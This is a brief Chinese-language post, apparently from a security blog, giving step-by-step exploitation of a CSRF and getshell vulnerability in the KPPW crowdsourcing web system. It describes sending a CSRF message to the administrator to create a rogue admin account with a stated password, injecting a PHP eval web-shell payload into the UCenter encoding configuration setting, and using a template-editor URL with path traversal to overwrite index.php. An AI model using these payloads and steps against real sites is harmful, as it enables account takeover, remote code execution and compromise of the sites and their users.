0

客客威客系统CSRF+getshell漏洞利用方法

已有 2,667 人阅读此文 - -

1.注册会员

2.

http://127.0.0.1/index.php?do=user&view=message&msg_type=write

3,发送给admin,下面是csrf,目的是加一个管理员,账户kppw 密码kppwkppw

4,getshell方法有两个
(1)gpc off 全局配置 会员整合 UCENTER 编码 修改为’);eval($_POST[a])?>;
连接http://127.0.0.1/config/config_ucenter.php

(2)

http://127.0.0.1/control/admin/index.php?do=tpl&view=edit_tpl&tplname=default&tname=../../index.php

0
相关文章!